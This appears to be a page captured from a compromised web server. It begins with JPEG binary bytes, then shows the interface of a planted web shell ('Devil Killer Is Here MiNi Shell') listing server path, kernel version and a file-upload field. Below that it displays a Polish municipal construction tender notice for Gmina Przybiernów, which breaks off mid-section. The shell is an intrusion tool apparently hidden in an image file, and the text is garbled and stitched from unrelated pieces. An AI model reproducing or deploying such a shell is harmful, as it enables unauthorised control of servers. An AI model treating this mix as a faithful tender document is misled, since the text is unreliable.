JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240712/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240712/0041077701-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Poprawa infrastruktury kulturalnej w Gminie Przybiernów1Termomodernizacja ośr kult w Moracz, Brzozowo,Czarnogłowy i świetlica wiejska w Rokicie,2Budowa świetlicy konten w Łoźnicy,3nadzór inwestorski </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA PRZYBIERNÓW</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 811684344</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Cisowa 3</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Przybiernów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">72-110</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">zachodniopomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL428 - Szczeciński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">914667530</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">914186622</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@przybiernow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.przybiernow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Poprawa infrastruktury kulturalnej w Gminie Przybiernów1Termomodernizacja ośr kult w Moracz, Brzozowo,Czarnogłowy i świetlica wiejska w Rokicie,2Budowa świetlicy konten w Łoźnicy,3nadzór inwestorski </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-185dd96c-416f-4d21-9676-816b40e3a69d</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00410777</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-07-12</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00209150/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.8 Poprawa infrastruktury kulturalnej w Gminie Przybiernów</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://przybiernow.logintrade.net/rejestracja/ustawowe.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://przybiernow.logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">8.1	Komunikacja w postępowaniu o udzielenie zamówienia w tym składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między zamawiającym a wykonawcą, z uwzględnieniem wyjątków określonych w ustawie, odbywa się przy użyciu środków komunikacji elektronicznej. Przez środki komunikacji elektronicznej rozumie się środki komunikacji elektronicznej zdefiniowane w ustawie z dnia 18 lipca 2002 r. o świadczeniu usług drogą elektroniczną (tj. Dz. U. z 2020 r. poz. 344).<br/>8.2	W postępowaniu o udzielenie zamówienia ofertę, oświadczenia, o którym mowa w art. 125 ust. 1 ustawy Pzp, podmiotowe środki dowodowe, pełnomocnictwa, zobowiązanie podmiotu udostępniającego zasoby składa się, pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym bądź kwalifikowanym podpisem elektronicznym. <br/>8.3	Komunikacja między zamawiającym a wykonawcami odbywa się w języku polskim przy użyciu Platformy Przetargowej Gminy Przybiernów: https://przybiernow.logintrade.net/rejestracja/ustawowe.html <br/>8.4	Zamawiający nie przewiduje sposobu komunikowania się z Wykonawcami w inny sposób niż określony w SWZ.<br/><br/>8.5	Zamawiający informuje, iż wszelka korespondencja dotycząca niniejszego postępowania (pomiędzy zamawiającym a wykonawcami) będzie odbywała się za pośrednictwem Platformy Przetargowej Gminy Przybiernów : https://przybiernow.logintrade.net/rejestracja/ustawowe.html <br/>8.6	Zamawiający nie ponosi odpowiedzialności za złożenie przez Wykonawcę oferty w sposób niezgodny z instrukcją korzystania z www.logintrade.pl w szczególności za sytuację, gdy oferta nie zostanie złożona w miejscu wskazanym przez platformę określoną w punkcie 8.3 SWZ. Nieprawidłowe złożenie oferty skutkować będzie nieuwzględnieniem jej w prowadzonym postępowaniu. <br/>8.7	Do połączenia używany jest szyfrowany protokół HTTPS. Szyfrowanie danych odbywa się przy pomocy protokołu SSL. Certyfikat SSL zapewnia poufność transmisji danych przesyłanych przez Internet. Wykonawca posiadający konto na Platformie Przetargowej Gminy Przybiernów: ma dostęp do możliwości złożenia, zmiany, wycofania oferty, a także funkcjonalności pozwalających na zadawanie pytań do treści SWZ oraz komunikację z Zamawiającym w pozostałych obszarach.<br/>8.8	Wymagania techniczne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy użyciu Platformy Przetargowej Gminy Przybiernów:<br/>1)	dopuszczalne przeglądarki internetowe:<br/>•	Internet Explorer 8, Internet Explorer 9, Internet Explorer 10, Internet Explorer 11<br/>•	Google Chrome 31<br/>•	Mozilla Firefox 26<br/>•	Opera 18<br/>2)	pozostałe wymagania techniczne:<br/>•	dostęp do sieci Internet<br/>•	obsługa przez przeglądarkę protokołu XMLHttpRequest – ajax<br/>•	włączona obsługa JavaScript<br/>•	zalecana szybkość łącza internetowego powyżej 500 KB/s<br/>•	zainstalowany Acrobat Reader<br/>•	zainstalowane środowisko uruchomieniowe Java - Java SE Runtime Environment 6 Update 24 lub nowszy<br/><br/>3)	Oświadczenia lub dokumenty przekazywane za pośrednictwem środka komunikacji elektronicznej przesyła się w formatach danych określonych w przepisach wydanych na podstawie §2 ust. 1 i 2 Rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz.U. z 2020r. poz. 2452). Równocześnie Zamawiający rekomenduje na format danych przesyłanych plików: pdf.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) informujemy, że:<br/>1)	Administratorem danych osobowych Wykonawcy jest Wójt Gminy Przybiernów. Siedzibą wójta gminy jest Urząd Gminy w Przybiernowie, ul. Cisowa 3, 72-110 Przybiernów. Kontakt: osobisty w siedzibie urzędu, telefoniczny: +48 914186451 lub drogą elektroniczną na adres e-mail: sekretariat@przybiernow.pl<br/>2)	W sprawach związanych z danymi osobowymi Wykonawca może kontaktować się z Inspektorem Ochrony Danych Osobowych, którym jest pan Bartosz Kaniuk, poprzez adres adres email: bkaniuk@proinspektor.pl<br/>3)	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia Poprawa infrastruktury kulturalnej w Gminie Przybiernów” realizowana w częściach: Część nr 1 – Termomodernizacja ośrodków kultury w m. Moracz, Brzozowo, Czarnogłowy i zmiana sposobu użytkowania budynku hydroforni na świetlicę wiejską w Rokicie, Część nr 2 – Budowa świetlicy kontenerowej w Łoźnicy, Część nr 3 - nadzór inwestorski”<br/>4)	Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 74 ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych (tj. Dz. U. z 2023 r. poz. 1605 ze zm.), dalej „ustawa Pzp”; <br/>5)	Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy; a po tym czasie przez okres wymagany przepisami szczególnymi prawa, w szczególności ze względu na cele archiwalne- zgodnie z JRWA: dokumentacja zamówień publicznych posiada kategorię archiwalną B5 (okres przechowywania 5 lat) natomiast umowa zawartą w wyniku postępowania w trybie zamówień publicznych posiada kategorię archiwalną B10 (okres przechowywania 10 lat);<br/>6)	Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, <br/>związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp; <br/>7)	W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">8)	Posiada Pani/Pan:<br/>−	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>−	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych **;<br/>−	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO ***; <br/>−	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>9)	Nie przysługuje Pani/Panu:<br/>−	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>−	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>−	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO. <br/><br/><br/>* Wyjaśnienie: informacja w tym zakresie jest wymagana, jeżeli w odniesieniu do danego administratora lub podmiotu przetwarzającego istnieje obowiązek wyznaczenia inspektora ochrony danych osobowych.<br/>** Wyjaśnienie: skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania<br/>o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników.<br/>*** Wyjaśnienie: prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">GPB.271.5.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na kilka części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.12.) Maksymalna liczba części, jaka może zostać udzielona jednemu wykonawcy: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> „Poprawa infrastruktury kulturalnej w Gminie Przybiernów” realizowana w częściach: Część nr 1 – Termomodernizacja ośrodków kultury w m. Moracz, Brzozowo, Czarnogłowy i zmiana sposobu użytkowania budynku hydroforni na świetlicę wiejską w Rokicie<br/><br/>Termomodernizacja Gminnego Ośrodka Kultury w Czarnogłowach<br/>Obiekt objęty opracowaniem to budynek Gminnego Ośrodka Kultury w miejscowości Czarnogłowy.<br/>Obiekt zlokalizowany jest w centralnej części wsi Czarnogłowy pod adresem ul. Fabryczna 28, Czarnogłowy, powiat goleniowski, gmina Przybiernów, woj. zachodniopomorskie, na działce ewidencyjnej nr 259/2.<br/>Zakres prac remontowo-budowlanych obejmuje montaż izolacji cieplnej na ścianach zewnętrznych<br/>budynku oraz na ścianie pomiędzy remizą strażacką a salą nr 0.9.<br/>Według art. 29 ust. 3 pkt 1e, nie wymaga decyzji o pozwoleniu na budowę, natomiast wymaga zgłoszenia, o którym mowa w art. 30, wykonywanie robót budowlanych polegających na dociepleniu<br/>budynków o wysokości powyżej 12 m i nie wyższych niż 25 m, w którym to przedziale znajduje się<br/>opracowywany obiekt.<br/>Gmina Przybiernów jest w trakcie pozyskiwania zgłoszenia robót nie wymagających pozwolenia na budowę na ww. zadanie.<br/><br/>Termomodernizacja Gminnego Ośrodka Kultury w Brzozowie<br/>Obiekt objęty termomodernizacją to budynek świetlicy wiejskiej w miejscowości Brzozowo. Obiekt<br/>zlokalizowany jest w północnej części wsi Brzozowo pod numerem 34A, powiat goleniowski, gmina<br/>Przybiernów, woj. zachodniopomorskie, na działce ewidencyjnej nr 14/8.<br/>Zakres prac remontowo-budowlanych obejmuje montaż izolacji cieplnej na ścianach zewnętrznych<br/>budynku oraz na nawisie nad głównym wejściem do budynku.<br/>Według art. 29 ust. 4 pkt 1c, nie wymaga decyzji o pozwoleniu na budowę, oraz zgłoszenia, o którym mowa w art. 30, wykonywanie robót budowlanych polegających na dociepleniu budynków o wysokości nieprzekraczającej 12 m, do których zalicza się opracowywany obiekt.<br/><br/>Termomodernizacja Gminnego Ośrodka Kultury w Moraczu<br/>Obszar objęty opracowaniem to fragment budynku mieszkalno-użytkowego, o funkcji świetlicy wiejskiej w miejscowości Moracz. Obiekt zlokalizowany jest w centralnej części wsi Moracz pod numerem 7, powiat goleniowski, gmina Przybiernów, woj. zachodniopomorskie, na działce ewidencyjnej nr 113/2.<br/>Zakres prac remontowo-budowlanych obejmuje montaż izolacji cieplnej na ścianach zewnętrznych<br/>budynku. Według art. 29 ust. 4 pkt 1c, nie wymaga decyzji o pozwoleniu na budowę, oraz zgłoszenia, o którym mowa w art. 30, wykonywanie robót budowlanych polegających na dociepleniu budynków o wysokości nieprzekraczającej 12 m, do których zalicza się opracowywany obiekt.<br/><br/><br/>Zmiana sposobu użytkowania budynku hydroforni na świetlicę wiejską w Rokicie<br/>Przedmiotem inwestycji jest zmiana sposobu użytkowania budynku byłej hydroforni, powstałego w 1973 roku, na wiejską świetlicę środowiskową. Inwestycja zlokalizowana jest na działce nr 39/1, obr. geod. Rokita, gm. Przybiernów.<br/>Projektuje się uzupełnienie o chodnik wokół budynku i utwardzony dojazd z miejscami parkingowymi. Wysokość, szerokość i wszelkie gabaryty zewnętrzne budynku pozostają bez zmian.<br/>Prace będą wykonywane głównie wewnątrz budynku – wymiana drzwi, szpachlowanie ścian, instalacja elektryczna, wymiana okien, postawienie ścianki działowej. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45111000-8 - Roboty w zakresie burzenia, roboty ziemne</p> <p class="mb-0">45223500-1 - Konstrukcje z betonu zbrojonego</p> <p class="mb-0">45320000-6 - Roboty izolacyjne</p> <p class="mb-0">45261100-5 - Wykonywanie konstrukcji dachowych</p> <p class="mb-0">45261210-9 - Wykonywanie pokryć dachowych</p> <p class="mb-0">45410000-4 - Tynkowanie</p> <p class="mb-0">45440000-3 - Roboty malarskie i szklarskie</p> <p class="mb-0">45431000-7 - Kładzenie płytek</p> <p class="mb-0">45431200-9 - Kładzenie glazury</p> <p class="mb-0">45421000-4 - Roboty w zakresie stolarki budowlanej</p> <p class="mb-0">45443000-4 - Roboty elewacyjne</p> <p class="mb-0">45233200-1 - Roboty w zakresie różnych nawierzchni</p> <p class="mb-0">45332000-3 - Roboty instalacyjne wodne i kanalizacyjne</p> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <p class="mb-0">45110000-1 - Roboty w zakresie burzenia i rozbiórki obiektów budowlanych; roboty ziemne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">380 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Dla Części nr 1<br/><br/>1)	cena oferty (C)	60%	60 punktów<br/>2)	wydłużenie okresu gwarancji i rękojmi (G)	40%	40 punktów<br/><br/>Maksymalna ilość punktów możliwa do przydzielenia w toku oceny w obrębie wszystkich kryterium =100 pkt.<br/><br/>W odniesieniu do wykonawców, których oferty nie podlegają odrzuceniu dokonana zostanie ocena oferty w następujący sposób:<br/><br/>ad. 1) Sposób obliczenia punktów dla kryterium cena oferty (C):<br/>W kryterium cena oferty największą liczbę punktów uzyska oferta z najniższą ceną (brutto).<br/><br/>Ocena ofert w tym kryterium zostanie przeprowadzona w oparciu o poniższy wzór:<br/><br/> Cmin<br/>Wartość punktowa „C” = -------------------------------- x Max(C) <br/> Cbad<br/>gdzie: <br/>Cmin - cena brutto najniższa spośród wszystkich ofert<br/>Cbad - cena brutto podana w ofercie badanej<br/>Max(C) - maksymalna ilość punktów, jakie może otrzymać oferta za kryterium cena oferty (tj. 60 pkt)<br/><br/>Oferty będą oceniane w odniesieniu do najkorzystniejszych warunków przedstawionych przez Wykonawców w zakresie kryterium. Oferta wypełniająca w najwyższym stopniu wymagania określone kryterium otrzyma maksymalną ilość punktów. Pozostałym Wykonawcom, spełniającym wymagania kryterialne, przypisana zostanie odpowiednio mniejsza (proporcjonalnie mniejsza) ilość punktów.<br/><br/><br/>Ad 2) Sposób obliczenia punktów dla kryterium wydłużenie okresu gwarancji i rękojmi (G):<br/><br/>Maksymalna ilość punktów możliwa do przydzielenia w toku oceny w obrębie danego kryterium wynosi 40,00 pkt.<br/><br/>Ocena ofert zostanie przeprowadzona w oparciu o przedstawione niżej wzór w oparciu o zaoferowany okres gwarancji i rękojmi, który należy podać w miesiącach w formularzu ofertowym (zał. nr 1 do SWZ): <br/><br/> Gbad<br/>Wartość punktowa (G) = -------------------------------- x Max (G)<br/> Gmax<br/><br/>gdzie: <br/>Gmax – najdłuższy okres gwarancji i rękojmi spośród wszystkich ofert<br/>Gbad – okres gwarancji i rękojmi podany w ofercie badanej<br/>Max(G) - maksymalna ilość punktów, jakie może otrzymać oferta za kryterium wydłużenie okresu gwarancji i rękojmi (tj. 40 pkt)<br/><br/>Oferty będą oceniane w odniesieniu do najkorzystniejszych warunków przedstawionych przez Wykonawców w zakresie kryterium. Oferta wypełniająca w najwyższym stopniu wymagania określone kryterium otrzyma maksymalną ilość punktów. Pozostałym Wykonawcom, spełniającym wymagania kryterialne, przypisana zostanie odpowiednio mniejsza (proporcjonalnie mniejsza) ilość punktów.<br/><br/>Wymagany minimalny przez Zamawiającego okres gwarancji i rękojmi wynosi 60 miesięcy. Maksymalny okres gwarancji i rękojmi wynosi 84 miesięcy. <br/><br/><br/><br/>Jeżeli Wykonawca zaoferuje okres gwarancji dłuższy niż 84 miesięcy do oceny ofert zostanie przyjęty okres 84 miesięcy. Brak wskazania w ofercie (w formularzu ofertowym) okresu gwarancji będzie równoznaczny z zaoferowaniem 60 miesięcy, za które Wykonawca otrzyma 0 pkt.<br/><br/>W przypadku gdy Wykonawca, który zaoferuje okres gwarancji krótszy niż 60 miesięcy oferta Wykonawcy zostanie odrzucona na podstawie art. 226 ust. 1 pkt 5) ustawy Pzp jako oferta, której treść jest niezgodna z warunkami zamówienia.<br/><br/><br/>Łączna wartość punktowa 